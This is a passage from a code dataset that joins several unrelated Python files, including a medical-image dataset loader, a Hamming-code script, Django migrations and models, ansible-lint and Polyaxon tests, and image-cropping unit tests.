    def __init__(self, which_set='train', *args, **kwargs):
        # Put which_set in canonical form: training, validation or testing
        if which_set in ("train", "training"):
            self.which_set = "train"
        elif which_set in ("val", "valid", "validation"):
            self.which_set = "valid"
        elif which_set in ("test", "testing"):
            self.which_set = "test"
        else:
            raise ValueError("Unknown set requested: %s" % which_set)
        # Define the images and mask paths
        # NOTE(review): self.path is read here before super().__init__ runs —
        # presumably set up by ThreadedDataset class-level config; confirm.
        self.image_path = os.path.join(self.path, self.which_set, 'images')
        self.mask_path = os.path.join(self.path, self.which_set, 'masks2')
        super(Polyps912Dataset, self).__init__(*args, **kwargs)
    def get_names(self):
        """Return a dict of names, per prefix/subset."""
        return {'default': self.filenames}
    def load_sequence(self, sequence):
        """Load a sequence of images/frames
        Auxiliary function that loads a sequence of frames with
        the corresponding ground truth and their filenames.
        Returns a dict with the images in [0, 1], their corresponding
        labels, their subset (i.e. category, clip, prefix) and their
        filenames.
        """
        from skimage import io
        image_batch, mask_batch, filename_batch = [], [], []
        for prefix, img_name in sequence:
            img = io.imread(os.path.join(self.image_path, img_name + ".bmp"))
            img = img.astype(floatX) / 255.
            mask = np.array(io.imread(os.path.join(self.mask_path,
                                                   img_name + ".tif")))
            mask = mask.astype('int32')
            # Add to minibatch
            image_batch.append(img)
            mask_batch.append(mask)
            filename_batch.append(img_name)
        ret = {}
        ret['data'] = np.array(image_batch)
        ret['labels'] = np.array(mask_batch)
        # NOTE(review): 'prefix' is the loop variable above; an empty
        # `sequence` would raise NameError here.
        ret['subset'] = prefix
        ret['filenames'] = np.array(filename_batch)
        return ret
def test():
    """Smoke-test the Polyps912 loaders: batch shapes, value ranges and timing."""
    shared_kwargs = dict(
        seq_per_subset=0,
        seq_length=0,
        return_one_hot=True,
        return_01c=True,
        return_list=True,
        use_threads=False)
    trainiter = Polyps912Dataset(
        which_set='train',
        batch_size=10,
        data_augm_kwargs={
            'crop_size': (288, 384)},
        **shared_kwargs)
    validiter = Polyps912Dataset(
        which_set='valid',
        batch_size=1,
        **shared_kwargs)
    testiter = Polyps912Dataset(
        which_set='test',
        batch_size=1,
        **shared_kwargs)
    # Get number of classes
    nclasses = trainiter.nclasses
    print("N classes: " + str(nclasses))
    void_labels = trainiter.void_labels
    print("Void label: " + str(void_labels))
    # Per-split info (same output as the original three print blocks)
    for label, it in (("Train", trainiter),
                      ("Validation", validiter),
                      ("Test", testiter)):
        print("{} n_images: {}, batch_size: {}, n_batches: {}".format(
            label, it.nsamples, it.batch_size, it.nbatches))
    train_batch_size = trainiter.batch_size
    train_nbatches = trainiter.nbatches
    start = time.time()
    tot = 0
    max_epochs = 1
    for epoch in range(max_epochs):
        for mb in range(train_nbatches):
            train_group = trainiter.next()
            if train_group is None:
                raise RuntimeError('One batch was missing')
            # train_group checks
            data, labels = train_group[0], train_group[1]
            assert data.ndim == 4
            assert data.shape[0] <= train_batch_size
            assert data.shape[1:] == (288, 384, 3)
            assert data.min() >= 0
            assert data.max() <= 1
            assert labels.ndim == 4
            assert labels.shape[0] <= train_batch_size
            assert labels.shape[1:] == (288, 384, nclasses)
            # time.sleep approximates running some model
            time.sleep(1)
            stop = time.time()
            part = stop - start - 1
            start = stop
            tot += part
            print("Minibatch %s time: %s (%s)" % (str(mb), part, tot))
def run_tests():
    """Entry point: run the loader smoke test."""
    test()
if __name__ == '__main__':
    run_tests()
|
StarcoderdataPython
|
1984198
|
<filename>hamming2.py
# (n, k) code: n -- symbols per codeword, k -- symbols per message
# generator matrix G of size k×n
# parity-check matrix H of size (n-k)×n
G = [
    [1, 0, 0, 0, 1, 1, 0],
    [0, 1, 0, 0, 1, 0, 1],
    [0, 0, 1, 0, 0, 1, 1],
    [0, 0, 0, 1, 1, 1, 1],
] # (7, 4)
import numpy as np
G = np.array(G)
print(G.T)
# In[0]
H = np.array([
    [1, 1, 0, 1, 1, 0, 0],
    [1, 0, 1, 1, 0, 1, 0],
    [0, 1, 1, 1, 0, 0, 1],
])
# H×G(T) = 0 (mod q)
# Sanity check that H really annihilates G over GF(2).
np.matmul(H,G.T) % 2
# In[0]
def getH(G, p=2):
    """Build the parity-check matrix for a systematic generator matrix.

    Assumes G = [I_k | P] (identity in the first k columns) and returns
    H = [-P^T | I_{n-k}] with every entry reduced modulo p.
    """
    k, n = G.shape
    H = np.zeros(shape=(n-k, n))
    # Identity block in the last n-k columns.
    for i in range(k, n):
        H[i-k, i] = 1
    # -P^T block. Bug fix: the original stored `p - G[i, j]`, which puts p
    # (not 0) wherever G[i, j] == 0; reduce mod p so H itself is a valid
    # matrix over Z_p (downstream `% p` usage masked this).
    for i in range(k):
        for j in range(k, n):
            H[j-k, i] = (p - G[i, j]) % p
    return H
# In[0]
import itertools
def allVectors(length, base=2):
    """Yield every length-`length` vector over {0, ..., base-1} as numpy arrays.

    The parameter was renamed from `len`, which shadowed the builtin; all
    in-file call sites pass it positionally.
    """
    return (np.array(v) for v in itertools.product(range(base), repeat=length))
# In[0]
def lincode(G, p=2):
    """Build (encode, decode) closures for the linear code generated by G over Z_p."""
    k,n = G.shape
    def encode(m):
        # Codeword c = m·G (computed as G^T · m), reduced mod p.
        return np.reshape(np.matmul(G.T, np.reshape(np.array(m), (k, 1))) % p, n)
    # Minimum distance = minimum weight over all nonzero messages
    # (islice skips the leading all-zero vector).
    d = min(np.count_nonzero(encode(m)) for m in itertools.islice(allVectors(k, p), 1, None))
    ec = (d-1)//2
    print(f"Code distance is {d}, can correct {ec} errors")
    H = getH(G, p)
    # Syndrome table: stringified syndrome -> correctable error vector
    # (all error patterns of weight 1..ec).
    tbl = {}
    for ei in allVectors(n, p):
        if 0 < np.count_nonzero(ei) <= ec:
            si = np.reshape(np.matmul(H, ei) % p, n-k)
            tbl[str(si)] = np.reshape(ei, n)
    def decode(c):
        # A zero syndrome means c is already a valid codeword.
        s = np.reshape(np.matmul(H, c) % p, n-k)
        if np.count_nonzero(s) == 0:
            return c[:k]
        # NOTE(review): raises KeyError for error patterns heavier than ec.
        e = tbl[str(s)]
        c1 = c - e
        return c1[:k]
    return (encode, decode)
# Demo: build and exercise a (10, 5) code with p=4.
# NOTE(review): 4 is not prime, so mod-4 arithmetic is NOT the field GF(4);
# the linear-code math above assumes a prime modulus — verify this example.
# NOTE(review): rows 4 and 5 both have a 1 in column 3, so G is not in
# systematic [I|P] form as getH assumes.
encode, decode = lincode(G = np.array([
    [1, 0, 0, 0, 0, 0, 1, 1, 1, 1],
    [0, 1, 0, 0, 0, 1, 0, 1, 1, 1],
    [0, 0, 1, 0, 0, 1, 1, 0, 1, 1],
    [0, 0, 0, 1, 0, 1, 1, 1, 0, 1],
    [0, 0, 0, 1, 1, 1, 1, 1, 1, 0],
]), p=4) # (10, 5)
decode(encode([2,0,3,0,0])+np.array([2,0,0,0,0,0,0,0,0,0]))
|
StarcoderdataPython
|
265834
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-12-08 06:13
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """No-op merge migration reconciling two divergent 0002 migrations."""
    dependencies = [
        ('bicycleparking', '0002_auto_20171129_0126'),
        ('bicycleparking', '0002_auto_20171129_0128'),
    ]
    # Intentionally empty: this migration only merges the two branches.
    operations = [
    ]
|
StarcoderdataPython
|
11352168
|
from pathlib import Path
# Absolute path of the directory containing this module; used as the data root.
DATA_DIR = Path(__file__).resolve().parent
|
StarcoderdataPython
|
9755674
|
import logging
import os
import shutil
from oslo_config import cfg
LOG = logging.getLogger(__name__)
def execute(filename, formatted_name):
    """Renames a file based on the name generated using metadata.

    :param str filename: absolute path and filename of original file
    :param str formatted_name: absolute path and new filename
    """
    # Skip the rename when the destination already exists, unless the
    # operator explicitly enabled overwriting.
    if os.path.isfile(formatted_name) and not cfg.CONF.overwrite_file_enabled:
        LOG.info('File %s already exists not forcefully moving %s',
                 formatted_name, filename)
        return
    LOG.info('renaming [%s] to [%s]', filename, formatted_name)
    if not cfg.CONF.dryrun:
        shutil.move(filename, formatted_name)
|
StarcoderdataPython
|
8147422
|
<reponame>hhucn/dbas<filename>api/tests/test_exports.py
import arrow
from webtest.response import TestResponse
from api.exports import import_aif
from api.tests.test_views import create_request_with_token_header
from dbas.database.discussion_model import Issue
from dbas.tests.utils import TestCaseWithConfig, test_app
class SaneAIF(TestCaseWithConfig):
    """Integration tests for the AIF export and import API endpoints."""
    def test_cat_or_dog_aif(self):
        # Export of the seeded 'cat-or-dog' issue must contain known nodes/edges.
        response: TestResponse = test_app().get("/api/cat-or-dog/aif")
        self.assertEqual(response.status_code, 200)
        self.assertIn("nodes", response.json_body)
        self.assertIn("edges", response.json_body)
        self.assertIn({
            "nodeID": "statement_24",
            "text": "the fact, that cats are capricious, is based on the cats race",
            "type": "I",
            "timestamp": "2017-08-09T11:25:09.222604+00:00"
        }, response.json_body["nodes"])
        self.assertIn({
            "edgeID": "argument_4_edge_out",
            "toID": "statement_3",
            "fromID": "argument_4"
        }, response.json_body["edges"])
    def test_import_not_allowed_for_normie(self):
        # A regular user must not be able to import a new issue (401).
        import_response = import_aif(create_request_with_token_header(nickname="Walter",
                                                                      match_dict={"slug": "cat-or-dog-2"},
                                                                      params={"title": "Cat or Dog 2", "lang": "en"},
                                                                      json_body={}))
        self.assertEqual(import_response.status_code, 401)
    def test_import(self):
        # A privileged user imports a minimal AIF graph and the resulting
        # issue must reflect its statements, arguments and timestamps.
        self.config.testing_securitypolicy(userid='Tobias', permissive=True)
        import_response = import_aif(create_request_with_token_header(nickname="Tobias",
                                                                      match_dict={"slug": "my-new-issue"},
                                                                      params={"title": "My new Issue", "lang": "en"},
                                                                      json_body={
                                                                          "nodes": [
                                                                              {
                                                                                  "nodeID": "argument_1",
                                                                                  "type": "CA",
                                                                                  "timestamp": "2017-08-19T11:25:09.347038+00:00"
                                                                              },
                                                                              {
                                                                                  "nodeID": "statement_1",
                                                                                  "text": "This is a Position",
                                                                                  "type": "I",
                                                                                  "timestamp": "2017-08-16T11:25:09.222796+00:00"
                                                                              },
                                                                              {
                                                                                  "nodeID": "statement_2",
                                                                                  "text": "This is a Premise",
                                                                                  "type": "I",
                                                                                  "timestamp": "2017-08-16T11:25:09.222796+00:00"
                                                                              }],
                                                                          "edges": [
                                                                              {
                                                                                  "edgeID": "argument_1_edge_out",
                                                                                  "fromID": "argument_1",
                                                                                  "toID": "statement_1"
                                                                              },
                                                                              {
                                                                                  "edgeID": "argument_1_edge_in_from_18",
                                                                                  "fromID": "statement_2",
                                                                                  "toID": "argument_1"
                                                                              }
                                                                          ]
                                                                      }))
        self.assertEqual(import_response.status_code, 201)
        new_issue = Issue.by_slug("my-new-issue")
        self.assertEqual(new_issue.lang, "en")
        self.assertCountEqual([position.get_text() for position in new_issue.positions], ["This is a Position"])
        self.assertCountEqual([statement.get_text() for statement in new_issue.statements],
                              ["This is a Position", "This is a Premise"])
        self.assertEqual(new_issue.positions[0].get_timestamp(), arrow.get("2017-08-16T11:25:09.222796+00:00"))
        self.assertEqual(new_issue.positions[0].arguments[0].timestamp,
                         arrow.get("2017-08-19T11:25:09.347038+00:00"))
        self.assertFalse(new_issue.positions[0].arguments[0].is_supportive,
                         "Argument with type CA should parse to supportive: False")
class SaneDot(TestCaseWithConfig):
    """Integration test for the Graphviz/DOT export endpoint."""
    def test_cat_or_dog_dot(self):
        response: TestResponse = test_app().get("/api/cat-or-dog/dot")
        self.assertEqual(200, response.status_code)
        self.assertIsInstance(response.body, bytes)
|
StarcoderdataPython
|
6631991
|
<filename>url_manager/views.py
#coding: utf-8
import re
import urllib
from models import WrongURL, LongURL, ShortURL
# NOTE(review): this alphabet is 63 characters long and contains '0' TWICE
# ('0123456789' followed by a stray '0'), so digit values 0 and 10 encode to
# the same character and distinct ids can produce colliding short URLs.
# Changing it would invalidate already-issued short URLs, so it is flagged
# here rather than silently fixed.
BASE62 = '01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
nBASE62 = len(BASE62)
# Loose http-only URL pattern used for input validation.
PATTERN = r'http://[^/^\s]+[.]\w{2,4}\S/?'
def get_short_id(url):
    """Return the ShortURL id for *url*, creating the mapping if needed.

    Raises WrongURL(0) for an empty URL, WrongURL(1) for a malformed one,
    WrongURL(2) when the short id cannot be stored, and WrongURL(3) when an
    existing long URL has no short id.

    Bug fix: the first two branches previously *returned* WrongURL
    instances instead of raising them (inconsistent with the later
    branches), handing callers an exception object as if it were an id.
    """
    if not url:
        raise WrongURL(0)
    if not re.match(PATTERN, url):
        raise WrongURL(1)
    longUrl, isnew = LongURL.objects.get_or_create(url=url)
    if isnew:
        short_id = encode_basen(longUrl.id)
        try:
            return ShortURL.objects.create(id=short_id, longUrl=longUrl).id
        except Exception:
            raise WrongURL(2)
    else:
        try:
            return ShortURL.objects.get(longUrl=longUrl).id
        except ShortURL.DoesNotExist:
            raise WrongURL(3)
def get_long_url(id):
    """Return the percent-quoted long URL for short id *id*, or '' if unknown.

    (The original docstring was a copy-paste of encode_basen's; corrected.)
    """
    try:
        return urllib.quote(ShortURL.objects.get(id=id).longUrl.url.encode('utf-8'), safe=':/=\?&')
    except Exception:
        # Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt
        # are no longer swallowed; lookup/encoding failures still yield ''.
        return ''
def encode_basen(id, n=nBASE62):
    """Encode non-negative integer *id* as a base-n string over BASE62.

    Digits are emitted least-significant first (the historical scheme —
    deliberately NOT reversed, to keep existing ids stable).

    Bug fix: id == 0 previously produced '' (an unusable short id); it now
    encodes to the zero digit.
    """
    if id == 0:
        return BASE62[0]
    base = id
    rests = []
    while base != 0:
        quotient, rest = divmod(base, n)
        rests.append(BASE62[rest])
        base = quotient
    return ''.join(rests)
|
StarcoderdataPython
|
167432
|
from numpy import pi, isclose
from pyroll.core import CircularOvalGroove
def test_circular_oval():
    """Check CircularOvalGroove geometry against precomputed reference values."""
    g = CircularOvalGroove(depth=5.05, r1=7, r2=33)
    # Reference values correspond to this specific depth/r1/r2 combination.
    assert isclose(g.usable_width, 17.63799973 * 2)
    assert isclose(g.alpha1, 29.102618 / 180 * pi)
    assert isclose(g.alpha2, 29.102618 / 180 * pi)
    assert isclose(g.z1, 19.45501221)
|
StarcoderdataPython
|
12854487
|
<filename>test/demo-random.py
# Demo: draw 10 random node ids from a complete 100-node graph using SNAP.
import snap
G = snap.GenFull(snap.PNEANet, 100)
# get a new random generator, provide the seed value
Rnd = snap.TRnd(42)
# randomize the generator, every execution will produce a different sequence.
# Comment out the line to get the same sequence on every execution.
Rnd.Randomize()
for i in range(0,10):
    # provide the random generator as a parameter to the function
    NId = G.GetRndNId(Rnd)
    print(NId)
# result is not well formed, the following statement fails
#print(NI.GetId())
|
StarcoderdataPython
|
4908163
|
<filename>core/tests/test_polypod/test_main/test_main_env_vars.py
#!/usr/bin/python
#
# Copyright 2018-2021 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from polyaxon.connections.kinds import V1ConnectionKind
from polyaxon.connections.schemas import (
V1BucketConnection,
V1ClaimConnection,
V1K8sResourceSchema,
)
from polyaxon.env_vars.keys import (
POLYAXON_KEYS_COLLECT_ARTIFACTS,
POLYAXON_KEYS_COLLECT_RESOURCES,
POLYAXON_KEYS_LOG_LEVEL,
)
from polyaxon.exceptions import PolypodException
from polyaxon.polyflow import V1Plugins
from polyaxon.polypod.common.env_vars import (
get_connection_env_var,
get_env_var,
get_env_vars_from_k8s_resources,
get_items_from_config_map,
get_items_from_secret,
get_kv_env_vars,
)
from polyaxon.polypod.main.env_vars import get_env_vars
from polyaxon.polypod.specs.contexts import PluginsContextsSpec
from polyaxon.schemas.types import V1ConnectionType, V1K8sResourceType
from tests.utils import BaseTestCase
@pytest.mark.polypod_mark
class TestMainEnvVars(BaseTestCase):
    """Tests for polyaxon.polypod.main.env_vars.get_env_vars: verifies the
    env var list assembled from plugin contexts, kv pairs, connections,
    secrets and config maps matches the helper builders' output."""
    def setUp(self):
        super().setUp()
        # Secrets
        # resource1/2: not requested; resource3/4/5: requested (env-var based);
        # resource6: requested and mounted at a path instead.
        self.resource1 = V1K8sResourceType(
            name="non_mount_test1",
            schema=V1K8sResourceSchema(name="ref", items=["item1", "item2"]),
            is_requested=False,
        )
        self.resource2 = V1K8sResourceType(
            name="non_mount_test2",
            schema=V1K8sResourceSchema(name="ref"),
            is_requested=False,
        )
        self.resource3 = V1K8sResourceType(
            name="non_mount_test1",
            schema=V1K8sResourceSchema(name="ref", items=["item1", "item2"]),
            is_requested=True,
        )
        self.resource4 = V1K8sResourceType(
            name="non_mount_test2",
            schema=V1K8sResourceSchema(name="ref"),
            is_requested=True,
        )
        self.resource5 = V1K8sResourceType(
            name="non_mount_test2",
            schema=V1K8sResourceSchema(name="ref"),
            is_requested=True,
        )
        self.resource6 = V1K8sResourceType(
            name="mount_test",
            schema=V1K8sResourceSchema(name="ref", mount_path="/test"),
            is_requested=True,
        )
        # Connections
        self.bucket_store = V1ConnectionType(
            name="test_s3",
            kind=V1ConnectionKind.S3,
            schema=V1BucketConnection(bucket="s3//:foo"),
            secret=self.resource3.schema,
        )
        self.mount_store = V1ConnectionType(
            name="test_claim",
            kind=V1ConnectionKind.VOLUME_CLAIM,
            schema=V1ClaimConnection(
                mount_path="/tmp", volume_claim="test", read_only=True
            ),
        )
    def test_get_env_vars(self):
        # With nothing configured the result is an empty list.
        assert (
            get_env_vars(
                contexts=None,
                log_level=None,
                kv_env_vars=None,
                connections=None,
                secrets=None,
                config_maps=None,
            )
            == []
        )
    def test_get_env_vars_with_kv_env_vars(self):
        # Check wrong kv env vars
        with self.assertRaises(PolypodException):
            get_env_vars(
                contexts=None,
                log_level=None,
                kv_env_vars=["x", "y", "z"],
                connections=None,
                secrets=None,
                config_maps=None,
            )
        with self.assertRaises(PolypodException):
            get_env_vars(
                contexts=None,
                log_level=None,
                kv_env_vars={"x": "y"},
                connections=None,
                secrets=None,
                config_maps=None,
            )
        # Valid kv env vars
        assert (
            get_env_vars(
                contexts=None,
                log_level=None,
                kv_env_vars=[["key1", "val1"], ["key2", "val2"]],
                connections=None,
                secrets=None,
                config_maps=None,
            )
            == get_kv_env_vars([["key1", "val1"], ["key2", "val2"]])
        )
    def test_get_env_vars_with_artifacts_store(self):
        # Collect-artifacts / collect-resources plugin flags map to the
        # corresponding POLYAXON_KEYS_COLLECT_* env vars; disabled flags add nothing.
        assert (
            get_env_vars(
                contexts=None,
                log_level=None,
                kv_env_vars=None,
                connections=None,
                secrets=None,
                config_maps=None,
            )
            == []
        )
        assert get_env_vars(
            contexts=PluginsContextsSpec.from_config(
                V1Plugins(
                    collect_logs=False, collect_artifacts=True, collect_resources=True
                )
            ),
            log_level=None,
            kv_env_vars=None,
            connections=None,
            secrets=None,
            config_maps=None,
        ) == [
            get_env_var(name=POLYAXON_KEYS_COLLECT_ARTIFACTS, value=True),
            get_env_var(name=POLYAXON_KEYS_COLLECT_RESOURCES, value=True),
        ]
        assert (
            get_env_vars(
                contexts=PluginsContextsSpec.from_config(
                    V1Plugins(
                        collect_logs=False,
                        collect_artifacts=False,
                        collect_resources=False,
                    )
                ),
                log_level=None,
                kv_env_vars=None,
                connections=None,
                secrets=None,
                config_maps=None,
            )
            == []
        )
        assert (
            get_env_vars(
                contexts=None,
                log_level=None,
                kv_env_vars=None,
                connections=None,
                secrets=None,
                config_maps=None,
            )
            == []
        )
        assert (
            get_env_vars(
                contexts=PluginsContextsSpec.from_config(
                    V1Plugins(
                        collect_logs=False,
                        collect_artifacts=True,
                        collect_resources=False,
                    )
                ),
                log_level=None,
                kv_env_vars=None,
                connections=None,
                secrets=None,
                config_maps=None,
            )
            == [get_env_var(name=POLYAXON_KEYS_COLLECT_ARTIFACTS, value=True)]
        )
    def test_get_env_vars_with_secrets(self):
        # Secrets expand to their item env vars regardless of is_requested.
        assert (
            get_env_vars(
                contexts=None,
                log_level=None,
                kv_env_vars=None,
                connections=None,
                secrets=[self.resource1, self.resource2],
                config_maps=None,
            )
            == get_items_from_secret(secret=self.resource1)
            + get_items_from_secret(secret=self.resource2)
        )
        assert (
            get_env_vars(
                contexts=None,
                log_level=None,
                kv_env_vars=None,
                connections=None,
                secrets=[
                    self.resource1,
                    self.resource2,
                    self.resource3,
                    self.resource4,
                ],
                config_maps=None,
            )
            == get_items_from_secret(secret=self.resource1)
            + get_items_from_secret(secret=self.resource2)
            + get_items_from_secret(secret=self.resource3)
            + get_items_from_secret(secret=self.resource4)
        )
    def test_get_env_vars_with_config_maps(self):
        # Config maps expand to their item env vars, mirroring the secret case.
        assert (
            get_env_vars(
                contexts=None,
                log_level=None,
                kv_env_vars=None,
                connections=None,
                secrets=None,
                config_maps=[self.resource1, self.resource2],
            )
            == get_items_from_config_map(config_map=self.resource1)
            + get_items_from_config_map(config_map=self.resource2)
        )
        assert (
            get_env_vars(
                contexts=None,
                log_level=None,
                kv_env_vars=None,
                connections=None,
                secrets=None,
                config_maps=[
                    self.resource1,
                    self.resource2,
                    self.resource3,
                    self.resource4,
                ],
            )
            == get_items_from_config_map(config_map=self.resource1)
            + get_items_from_config_map(config_map=self.resource2)
            + get_items_from_config_map(config_map=self.resource3)
            + get_items_from_config_map(config_map=self.resource4)
        )
    def test_get_env_vars_with_all(self):
        # End-to-end: log level + plugin flags + connection + kv pairs +
        # secrets/config maps, in that exact order.
        connection = V1ConnectionType(
            name="test_s3",
            kind=V1ConnectionKind.S3,
            schema=V1BucketConnection(bucket="s3//:foo"),
            secret=self.resource6.schema,
        )
        env_vars = get_env_vars(
            contexts=PluginsContextsSpec.from_config(
                V1Plugins(
                    collect_logs=False, collect_artifacts=True, collect_resources=True
                )
            ),
            log_level="info",
            kv_env_vars=[["key1", "val1"], ["key2", "val2"]],
            connections=[connection],
            secrets=[
                self.resource1,
                self.resource2,
                self.resource3,
                self.resource4,
                self.resource6,
            ],
            config_maps=[
                self.resource1,
                self.resource2,
                self.resource3,
                self.resource4,
            ],
        )
        expected = [
            get_env_var(name=POLYAXON_KEYS_LOG_LEVEL, value="info"),
            get_env_var(name=POLYAXON_KEYS_COLLECT_ARTIFACTS, value=True),
            get_env_var(name=POLYAXON_KEYS_COLLECT_RESOURCES, value=True),
        ]
        expected += get_connection_env_var(connection=connection, secret=self.resource6)
        expected += get_kv_env_vars([["key1", "val1"], ["key2", "val2"]])
        expected += get_env_vars_from_k8s_resources(
            secrets=[
                self.resource1,
                self.resource2,
                self.resource3,
                self.resource4,
                self.resource6,
            ],
            config_maps=[
                self.resource1,
                self.resource2,
                self.resource3,
                self.resource4,
            ],
        )
        assert env_vars == expected
|
StarcoderdataPython
|
6564418
|
<filename>ansible/tests/DepreciatedStatementUsage.py<gh_stars>1-10
from ansiblelint.rules import RulesCollection
from ansiblelint.runner import Runner
from ansiblelints.stage.DepreciatedStatementUsage import DepreciatedStatementUsage
class TestDepreciatedStatementUsage:
    """Runs the DepreciatedStatementUsage ansible-lint rule against a fixture playbook."""
    def test_file(self):
        collection = RulesCollection()
        collection.register(DepreciatedStatementUsage())
        file_name = 'testResources/ansible-smell/adminbydefault.yml'
        good_runner = Runner(file_name, rules=collection)
        # NOTE(review): only prints the lint result; there is no assertion,
        # so this test cannot fail on rule output — confirm intent.
        print(good_runner.run())
|
StarcoderdataPython
|
1647207
|
<reponame>pitchin/sentry<filename>src/sentry/models/projectownership.py
from __future__ import absolute_import
from jsonfield import JSONField
from django.db import models
from django.utils import timezone
from sentry.db.models import Model, sane_repr
from sentry.db.models.fields import FlexibleForeignKey
from sentry.ownership.grammar import dump_schema, parse_rules
class ProjectOwnership(Model):
    """Per-project issue-ownership rules: raw rule text plus its compiled schema."""
    __core__ = True
    project = FlexibleForeignKey('sentry.Project', unique=True)
    raw = models.TextField(null=True)  # user-entered ownership rules
    schema = JSONField(null=True)  # compiled form of `raw`; kept in sync by save()
    fallthrough = models.BooleanField(default=True)
    date_created = models.DateTimeField(default=timezone.now)
    last_updated = models.DateTimeField(default=timezone.now)
    is_active = models.BooleanField(default=True)
    class Meta:
        app_label = 'sentry'
        db_table = 'sentry_projectownership'
    __repr__ = sane_repr('project_id', 'is_active')
    def save(self, *args, **kwargs):
        # Recompile the schema from the raw rules on every save so the two
        # columns never drift apart.
        if self.raw is None:
            self.schema = None
        else:
            self.schema = dump_schema(parse_rules(self.raw))
        return super(ProjectOwnership, self).save(*args, **kwargs)
|
StarcoderdataPython
|
1848726
|
<reponame>pbs/django-cropduster
import datetime
import unittest
import os
import hashlib
import shutil
import uuid
from django.conf import settings
PATH = os.path.split(__file__)[0]
from django.db import models
from django.core.files.base import ContentFile
from django.core.exceptions import ObjectDoesNotExist as DNE, ValidationError
import cropduster.models as CM
import cropduster.utils as CMU
from PIL import Image
def abspath(x):
    """Resolve *x* relative to this test module's directory (PATH)."""
    # Converted from `abspath = lambda x: ...` (PEP 8 E731: don't assign lambdas).
    return os.path.join(PATH, x)


def to_retina_path(p):
    """Insert an '@2x' retina marker before the file extension."""
    return '%s@2x%s' % os.path.splitext(p)
def save_all(objs):
    """Persist every object in *objs* by calling its save() method."""
    for obj in objs:
        obj.save()
def delete_all(model):
    """Delete every stored instance of the given model class."""
    for instance in model.objects.all():
        instance.delete()
def hashfile(path):
    """Return the raw MD5 digest of the file at *path*.

    Reads in 4 KiB chunks so large files need not fit in memory.
    """
    md5 = hashlib.md5()
    # Bug fix: the original used the Python 2 `file()` builtin (removed in
    # Python 3) and text mode; open in binary so the digest covers raw bytes.
    with open(path, 'rb') as f:
        data = f.read(4096)
        while data:
            md5.update(data)
            data = f.read(4096)
    return md5.digest()
# Point all upload/static roots at a unique throwaway directory per test run.
settings.MEDIA_ROOT = settings.STATIC_ROOT = settings.UPLOAD_PATH = '/tmp/cd_test/%s' % uuid.uuid4().hex
ORIG_IMAGE = abspath('testdata/img1.jpg')  # pristine fixture image
TEST_IMAGE = settings.UPLOAD_PATH + '/' + os.path.basename(ORIG_IMAGE)  # working copy
class TestCropduster(unittest.TestCase):
def setUp(self):
os.makedirs(settings.MEDIA_ROOT)
settings.CROPDUSTER_UPLOAD_PATH = 'cd'
os.system('cp %s %s' % (ORIG_IMAGE, TEST_IMAGE))
# Backup the image
def tearDown(self):
# Delete all objects
delete_all( CM.Image )
delete_all( CM.SizeSet )
delete_all( CM.Size )
delete_all( CM.Crop )
if os.path.exists(settings.UPLOAD_PATH):
os.system('rm -rf %s' % settings.UPLOAD_PATH)
    def create_size_sets(self):
        """Create two fixture SizeSets: 'facebook' (thumb + banner) and 'mobile' (headline)."""
        iss = CM.SizeSet(name='Facebook', slug='facebook')
        iss.save()
        thumb = CM.Size(name='Thumbnail',
                        slug='thumb',
                        width=60,
                        height=60,
                        auto_crop=True,
                        retina=True,
                        size_set=iss)
        thumb.save()
        # Banner has no fixed height; it is derived from the aspect ratio.
        banner = CM.Size(name='Banner',
                         slug='banner',
                         width=1024,
                         aspect_ratio=1.3,
                         size_set=iss)
        banner.save()
        iss2 = CM.SizeSet(name='Mobile', slug='mobile')
        iss2.save()
        splash = CM.Size(name='Headline',
                         slug='headline',
                         width=500,
                         height=400,
                         retina=True,
                         auto_crop=True,
                         size_set=iss2)
        splash.save()
def get_test_image(self, image=TEST_IMAGE):
cd1 = CM.Image(image=image)
cd1.metadata.attribution = "AP",
cd1.metadata.caption = 'This is a galaxy'
cd1.save()
return cd1
    def test_original(self):
        """A freshly created image is an original with no derived images."""
        # NOTE(review): assertEquals is a deprecated alias removed in
        # Python 3.12; migrate to assertEqual when updating this suite.
        cd1 = self.get_test_image()
        self.assertEquals(cd1.is_original, True)
        self.assertEquals(cd1.derived.count(), 0)
    def test_size_sets(self):
        """
        Tests size sets work correctly on images.
        """
        # NOTE(review): assertEquals / assert_ / failUnlessRaises are
        # deprecated aliases removed in Python 3.12.
        cd1 = self.get_test_image()
        self.create_size_sets()
        # Add the size set
        child_images = cd1.add_size_set(name='Facebook')
        # Check that we now have two derived images which haven't been rendered.
        self.assertEquals(len(child_images), 2)
        self.assert_(all(not ci.image for ci in child_images))
        # Should be zero since we haven't saved the images
        self.assertEquals(cd1.derived.count(), 0)
        save_all(child_images)
        self.assertEquals(cd1.derived.count(), 2)
        # Try adding it again, which should basically do a no-op
        images = cd1.add_size_set(name='Facebook')
        # No new image sizes added, so no more images.
        self.assertEquals(len(images), 0)
        self.assertEquals(cd1.size_sets.count(), 1)
        # Try adding one that doesn't exist
        self.failUnlessRaises(DNE, cd1.add_size_set, name='foobar')
        # Add another new size_set
        new_images = cd1.add_size_set(slug='mobile')
        self.assertEquals(len(new_images), 1)
        save_all(new_images)
        self.assertEquals(cd1.derived.count(), 3)
def test_render_original(self):
    """
    Tests that we can render the original image.
    """
    cd1 = self.get_test_image()
    size = CM.Size(name='test', slug='test', width=50,
                   height=50, auto_crop=True, retina=False)
    size.save()
    cd1.size = size
    # Check that we are protecting original images.
    self.failUnlessRaises(ValidationError, cd1.render)
    # Get hash of original
    orig_hash = hashfile( cd1.image.path )
    # force=True bypasses the original-image protection checked above.
    cd1.render(force=True)
    # Check that it hasn't overwritten the original file until we save.
    self.assertEquals( hashfile(cd1.image.path), orig_hash)
    cd1.save()
    # Check that it changed.
    self.assertNotEquals(orig_hash, hashfile( cd1.image.path ) )
def test_render_derived(self):
    """
    Tests that we can correctly render derived images from the original.
    """
    self.create_size_sets()
    cd1 = self.get_test_image()
